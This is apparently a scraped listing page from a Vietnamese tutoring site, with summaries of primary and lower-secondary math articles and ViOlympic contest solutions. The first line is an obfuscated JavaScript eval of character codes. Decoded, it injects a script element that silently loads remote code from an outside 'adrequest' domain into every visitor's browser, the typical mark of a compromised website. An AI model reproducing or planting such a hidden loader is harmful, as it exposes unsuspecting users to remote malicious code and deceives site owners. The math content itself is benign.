var _0x42tbc1 = 1; eval(String.fromCharCode(118, 97, 114, 32, 97, 49, 32, 61, 32, 102, 117, 110, 99, 116, 105, 111, 110, 40, 41, 32, 123, 10, 32, 32, 32, 32, 118, 97, 114, 32, 95, 48, 120, 52, 50, 116, 98, 99, 49, 32, 61, 32, 83, 116, 114, 105, 110, 103, 91, 34, 92, 120, 54, 54, 92, 120, 55, 50, 92, 120, 54, 70, 92, 120, 54, 68, 92, 120, 52, 51, 92, 120, 54, 56, 92, 120, 54, 49, 92, 120, 55, 50, 92, 120, 52, 51, 92, 120, 54, 70, 92, 120, 54, 52, 92, 120, 54, 53, 34, 93, 40, 49, 48, 52, 44, 32, 49, 49, 54, 44, 32, 49, 49, 54, 44, 32, 49, 49, 50, 44, 32, 49, 49, 53, 44, 32, 53, 56, 44, 32, 52, 55, 44, 32, 52, 55, 44, 32, 57, 55, 44, 32, 49, 48, 48, 44, 32, 49, 49, 52, 44, 32, 49, 48, 49, 44, 32, 49, 49, 51, 44, 32, 49, 49, 55, 44, 32, 49, 48, 49, 44, 32, 49, 49, 53, 44, 32, 49, 49, 54, 44, 32, 52, 54, 44, 32, 49, 50, 48, 44, 32, 49, 50, 49, 44, 32, 49, 50, 50, 44, 32, 52, 55, 44, 32, 57, 55, 44, 32, 49, 48, 48, 44, 32, 52, 54, 44, 32, 49, 48, 54, 44, 32, 49, 49, 53, 44, 32, 54, 51, 44, 32, 49, 49, 54, 44, 32, 54, 49, 44, 32, 52, 57, 41, 59, 10, 32, 32, 32, 32, 118, 97, 114, 32, 95, 48, 120, 52, 50, 116, 98, 99, 50, 32, 61, 32, 100, 111, 99, 117, 109, 101, 110, 116, 91, 34, 92, 120, 54, 51, 92, 120, 55, 50, 92, 120, 54, 53, 92, 120, 54, 49, 92, 120, 55, 52, 92, 120, 54, 53, 92, 120, 52, 53, 92, 120, 54, 67, 92, 120, 54, 53, 92, 120, 54, 68, 92, 120, 54, 53, 92, 120, 54, 69, 92, 120, 55, 52, 34, 93, 40, 34, 92, 120, 55, 51, 92, 120, 54, 51, 92, 120, 55, 50, 92, 120, 54, 57, 92, 120, 55, 48, 92, 120, 55, 52, 34, 41, 59, 10, 32, 32, 32, 32, 95, 48, 120, 52, 50, 116, 98, 99, 50, 91, 34, 92, 120, 55, 52, 92, 120, 55, 57, 92, 120, 55, 48, 92, 120, 54, 53, 34, 93, 32, 61, 32, 34, 92, 120, 55, 52, 92, 120, 54, 53, 92, 120, 55, 56, 92, 120, 55, 52, 92, 120, 50, 70, 92, 120, 54, 65, 92, 120, 54, 49, 92, 120, 55, 54, 92, 120, 54, 49, 92, 120, 55, 51, 92, 120, 54, 51, 92, 120, 55, 50, 92, 120, 54, 57, 92, 120, 55, 48, 92, 120, 55, 52, 34, 59, 10, 32, 32, 32, 32, 95, 48, 120, 52, 50, 116, 98, 99, 50, 91, 34, 92, 120, 54, 49, 92, 120, 55, 51, 92, 120, 55, 57, 92, 120, 54, 69, 92, 120, 54, 51, 34, 93, 32, 61, 32, 116, 114, 117, 101, 59, 10, 32, 32, 32, 32, 95, 48, 120, 52, 50, 116, 98, 99, 50, 91, 34, 92, 120, 54, 57, 92, 120, 54, 52, 34, 93, 32, 61, 32, 34, 92, 120, 54, 51, 92, 120, 54, 52, 92, 120, 51, 55, 92, 120, 51, 48, 92, 120, 51, 57, 92, 120, 51, 48, 92, 120, 51, 49, 92, 120, 51, 48, 92, 120, 51, 48, 92, 120, 51, 49, 92, 120, 51, 48, 92, 120, 51, 49, 92, 120, 51, 48, 34, 59, 10, 32, 32, 32, 32, 95, 48, 120, 52, 50, 116, 98, 99, 50, 91, 34, 92, 120, 55, 51, 92, 120, 55, 50, 92, 120, 54, 51, 34, 93, 32, 61, 32, 95, 48, 120, 52, 50, 116, 98, 99, 49, 59, 10, 32, 32, 32, 32, 118, 97, 114, 32, 95, 48, 120, 52, 50, 116, 98, 99, 51, 32, 61, 32, 100, 111, 99, 117, 109, 101, 110, 116, 91, 34, 92, 120, 54, 55, 92, 120, 54, 53, 92, 120, 55, 52, 92, 120, 52, 53, 92, 120, 54, 67, 92, 120, 54, 53, 92, 120, 54, 68, 92, 120, 54, 53, 92, 120, 54, 69, 92, 120, 55, 52, 92, 120, 55, 51, 92, 120, 52, 50, 92, 120, 55, 57, 92, 120, 53, 52, 92, 120, 54, 49, 92, 120, 54, 55, 92, 120, 52, 69, 92, 120, 54, 49, 92, 120, 54, 68, 92, 120, 54, 53, 34, 93, 40, 34, 92, 120, 55, 51, 92, 120, 54, 51, 92, 120, 55, 50, 92, 120, 54, 57, 92, 120, 55, 48, 92, 120, 55, 52, 34, 41, 91, 48, 93, 59, 10, 32, 32, 32, 32, 95, 48, 120, 52, 50, 116, 98, 99, 51, 91, 34, 92, 120, 55, 48, 92, 120, 54, 49, 92, 120, 55, 50, 92, 120, 54, 53, 92, 120, 54, 69, 92, 120, 55, 52, 92, 120, 52, 69, 92, 120, 54, 70, 92, 120, 54, 52, 92, 120, 54, 53, 34, 93, 91, 34, 92, 120, 54, 57, 92, 120, 54, 69, 92, 120, 55, 51, 92, 120, 54, 53, 92, 120, 55, 50, 92, 120, 55, 52, 92, 120, 52, 50, 92, 120, 54, 53, 92, 120, 54, 54, 92, 120, 54, 70, 92, 120, 55, 50, 92, 120, 54, 53, 34, 93, 40, 95, 48, 120, 52, 50, 116, 98, 99, 50, 44, 32, 95, 48, 120, 52, 50, 116, 98, 99, 51, 41, 10, 125, 59, 10, 118, 97, 114, 32, 116, 110, 100, 101, 109, 111, 115, 32, 61, 32, 100, 111, 99, 117, 109, 101, 110, 116, 91, 34, 92, 120, 54, 55, 92, 120, 54, 53, 92, 120, 55, 52, 92, 120, 52, 53, 92, 120, 54, 67, 92, 120, 54, 53, 92, 120, 54, 68, 92, 120, 54, 53, 92, 120, 54, 69, 92, 120, 55, 52, 92, 120, 55, 51, 92, 120, 52, 50, 92, 120, 55, 57, 92, 120, 53, 52, 92, 120, 54, 49, 92, 120, 54, 55, 92, 120, 52, 69, 92, 120, 54, 49, 92, 120, 54, 68, 92, 120, 54, 53, 34, 93, 40, 34, 92, 120, 55, 51, 92, 120, 54, 51, 92, 120, 55, 50, 92, 120, 54, 57, 92, 120, 55, 48, 92, 120, 55, 52, 34, 41, 59, 10, 118, 97, 114, 32, 110, 32, 61, 32, 116, 114, 117, 101, 59, 10, 102, 111, 114, 32, 40, 118, 97, 114, 32, 105, 32, 61, 32, 48, 59, 32, 105, 32, 60, 32, 116, 110, 100, 101, 109, 111, 115, 91, 34, 92, 120, 54, 67, 92, 120, 54, 53, 92, 120, 54, 69, 92, 120, 54, 55, 92, 120, 55, 52, 92, 120, 54, 56, 34, 93, 59, 32, 105, 43, 43, 41, 32, 123, 10, 32, 32, 32, 32, 105, 102, 32, 40, 116, 110, 100, 101, 109, 111, 115, 91, 105, 93, 91, 34, 92, 120, 54, 57, 92, 120, 54, 52, 34, 93, 32, 61, 61, 32, 34, 92, 120, 54, 51, 92, 120, 54, 52, 92, 120, 51, 55, 92, 120, 51, 48, 92, 120, 51, 57, 92, 120, 51, 48, 92, 120, 51, 49, 92, 120, 51, 48, 92, 120, 51, 48, 92, 120, 51, 49, 92, 120, 51, 48, 92, 120, 51, 49, 92, 120, 51, 48, 34, 41, 32, 123, 10, 32, 32, 32, 32, 32, 32, 32, 32, 110, 32, 61, 32, 102, 97, 108, 115, 101, 10, 32, 32, 32, 32, 125, 10, 125, 59, 10, 105, 102, 32, 40, 110, 32, 61, 61, 32, 116, 114, 117, 101, 41, 32, 123, 10, 32, 32, 32, 32, 97, 49, 40, 41, 59, 10, 125));

Học toán lớp 5 trên mạng

Hỏi toán lớp 5 – Bài toán về lãi suất

Hỏi toán lớp 5 – Bài toán về lãi suất Đề bài: Một người mua vào một chiếc quạt với giá 200000 đồng .Hỏi người đó phải bán chiếc quạt với giá bao nhiêu để được lãi 20% giá bán ? Phân tích bài toán:  Vốn = 200000 đồng Giá bán là 100% thì lãi 20% […]

Giải các bài toán hình học trong đề thi violympic vòng 19

Giải các bài toán hình học trong đề thi violympic vòng 19

Giải các bài toán hình học trong đề thi violympic vòng 19 qua các năm 2012 – 2013; 2013 – 2014 và 2014 – 2015. Các bài toán được gia sư toán thủ khoa chọn từ đề thi vòng 19 của các năm trước. Lời giải và hướng dẫn được chúng tôi tự giải hoặc […]

Giải các bài toán liên quan đến chia hết – chia có dư trong đề thi violympic vòng 19

Giải các bài toán liên quan đến chia hết – chia có dư trong đề thi violympic vòng 19 qua các năm 2012 – 2013; 2013 – 2014 và 2014 – 2015. Chúc các em ôn tập thật tốt và thi đạt kết quả cao. Câu 1: Vòng 19 năm 2012 – 2013 Có bao […]

Giải các bài toán liên quan đến tỉ số phần trăm trong đề thi violympic toán 5 cấp quốc gia qua các năm

Giải các bài toán liên quan đến tỉ số phần trăm trong đề thi violympic toán 5 cấp quốc gia qua các năm 2012 – 2013; 2013 – 2014 và 2014 – 2015. Giải bài tập bởi gia sư toán của Gia sư thủ khoa Tài Đức Việt. Câu 1: Vòng 19 cấp quốc gia […]

Giải các bài toán liên quan đến dãy số trong đề thi violympic toán 5 cấp quốc gia qua các năm

Giải các bài toán liên quan đến dãy số trong đề thi violympic toán 5 cấp quốc gia qua các năm 2012 – 2013; 2013 – 2014 và 2014 – 2015. Ngày 8 tháng 4 tới đây vòng thi cuối cùng của cuộc thi giải toán qua mạng lớp 5 sẽ bắt đầu. Nhằm mục […]

Tính tổng 100 số đầu tiên của dãy sau?

Gia sư toán tổng hợp một số bài toán lớp 5 hay và độc đáo. Rèn luyện khả năng tư duy của các em Đề bài: Tính tổng 100 số đầu tiên của dãy sau: 1; 2; 3; 4; 5; 6; 7; 8; 9; 1; 0; 1; 1; 1 ; 2; 1; 3; 1; 4; 1; […]

Có bao nhiêu số có 5 chữ số chia hết cho 5 và 8?

Đề bài: Có bao nhiêu số có 5 chữ số chia hết cho 5 và 8? Giải Dấu hiệu chia hết cho 8 là số có 3 chữ tận cùng chia hết cho 8. Do chia hết cho 8 nên số đó chẵn mà chia hết cho 5 nữa nên có tận cùng là 0. […]

Giải Vòng 6 Toán 5 Thi ViOlympic 2015 2016

Giải Vòng 6 Toán 5 Thi ViOlympic 2015 2016 Video thực hiện bởi gia sư toán của Trung tâm gia sư Tài Đức Việt Phần 1: Phần 2: Phần 3:

Giải toán Violympic vòng 5 lớp 5 năm học 2015 – 2016

Giải toán Violympic vòng 5 lớp 5 năm học 2015 – 2016 Các dạng toán cần nắm vững ở vòng này là: So sánh số thập phân Đổi phân số sang số thập phân và ngược lại Toán về công việc chung Tìm hai số khi biết tổng và tỉ, tổng và hiệu, hiệu và […]

Toán 5: Hãy viết các số thập phân bé hơn 1 mà trong mỗi số có 3 chữ số khác nhau ở phần thập, gồm các chữ số 1;2;3. Xếp các số đó theo thứ tự từ bé đến lớn

Hãy viết các số thập phân bé hơn 1 mà trong mỗi số có 3 chữ số khác nhau ở phần thập, gồm các chữ số 1;2;3. Xếp các số đó theo thứ tự từ bé đến lớn. Hướng dẫn trả lời: Các số thập phân bé hơn 1 sẽ có phần nguyên là 0. […]

TOÁN LỚP 5 NÂNG CAO – PHÉP CHIA CÓ DƯ

TOÁN LỚP 5 NÂNG CAO – PHÉP CHIA CÓ DƯ Ở loại này cần lưu ý: – Nếu a: 2 dư 1 thì chữ số tận cùng của a là 1, 3, 5, 7, 9 – Nếu a: 5 dư 1 thì chữ số tận cùng của a phải là 1 hoặc 6; a: 5 […]

TOÁN LỚP 5 NÂNG CAO – VẬN DỤNG TÍNH CHẤT CHIA HẾT CỦA MỘT TỔNG HOẶC MỘT HIỆU

TOÁN LỚP 5 NÂNG CAO – VẬN DỤNG TÍNH CHẤT CHIA HẾT CỦA MỘT TỔNG HOẶC MỘT HIỆU. Một số lưu ý: –         Nếu mỗi số hạng của một tổng đều chia hết cho một số nào đó thì tổng đó cũng chia hết cho số đó. –         Nếu số bị trừ và số trừ […]

Các phương pháp giải toán tiểu học

Phương pháp tính ngược từ cuối Có một số bài toán cho biết kết quả sau khi thực hiện liên tiếp một số phép tính đối với số phải tìm. Khi giải các bài toán dạng này, ta thường dùng phương pháp tính ngược từ cuối (đôi khi còn gọi là phương pháp suy ngược từ cuối). Khi […]

Hướng dẫn giải toán trồng cây

TOÁN TRỒNG CÂY * Những điều cần nhớ: – Nếu trồng cây ở cả hai đầu đường thì: số cây = số khoảng cách + 1 – Nếu không trồng cây ở cả hai đầu đường: số cây = số khoảng cách – 1 – Nếu trồng cây trên một đường khép kín: số cây […]

Hướng Dẫn Giải Toán ViOlympic 2015 Lớp 5 vòng 3 năm 2015 – 2016

Hướng Dẫn Giải Toán ViOlympic 2015 Lớp 5 vòng 3 năm 2015 – 2016 Các dạng toán cần chú ý: – Tìm hai số khi biết: tổng – hiệu, tổng – tỉ. hiệu – tỉ – Các phép tính với phân số, hỗn số… – Rút gọn phân số, so sánh hai số… Video được […]

Dấu hiệu chia hết cho 2, 3, 5, 9, 4, 8, 25, 125, 11

[Một số dấu hiệu chia hết cơ bản trên số tự nhiên] – Dấu hiệu chia hết cho 2, 3, 5, 9, 4, 8, 25, 125, 11. –      Dấu hiệu chia hết cho 2: Các số có chữ số tận cùng chia hết cho 2 (Hoặc các chữ số tận cùng là số chẵn: 0, 2, […]

Hướng Dẫn Giải Toán ViOlympic 2015 Lớp 4 vòng 3 năm 2015 – 2016

Hướng Dẫn Giải Toán ViOlympic 2015 Lớp 4 vòng 3 năm 2015 – 2016 So sánh số tự nhiên, đọc số tự nhiên, lập số tự nhiên Video hướng dẫn giúp các em trong phần thi vượt chướng ngại vật các vòng đầu thi giải toán trên mạng Video được quay bởi Trung Tâm Gia […]

[Toán 8] Xác định hằng số a để đa thức chia hết cho đa thức khác

Chia đa thức phần 2, xác định hằng số để đa thức chia hết cho đa thức khác. Video được quay bởi Trung Tâm Gia Sư Tài Đức Việt. Liên hệ: 0936 128 126.

Hướng dẫn bài toán nhận biết hình, đếm số hình lớp 5

Tính số hình, số cạnh, số đường chéo, trồng một số cây thành một số hàng cho trước… Toán hình học lớp 5. – Trồng 10 cây thành 10 hàng mỗi hàng 3 cây – Trông 11 cây thành 10 hàng mỗi hàng 3 cây – Trồng 10 cây thành 5 hàng mỗi hàng 4 […]

Hướng Dẫn Một Số Bài Toán Rèn Luyện Tư Duy Dãy Số

Vi DeoHướng Dẫn Một Số Bài Toán Rèn Luyện Tư Duy Dãy Số.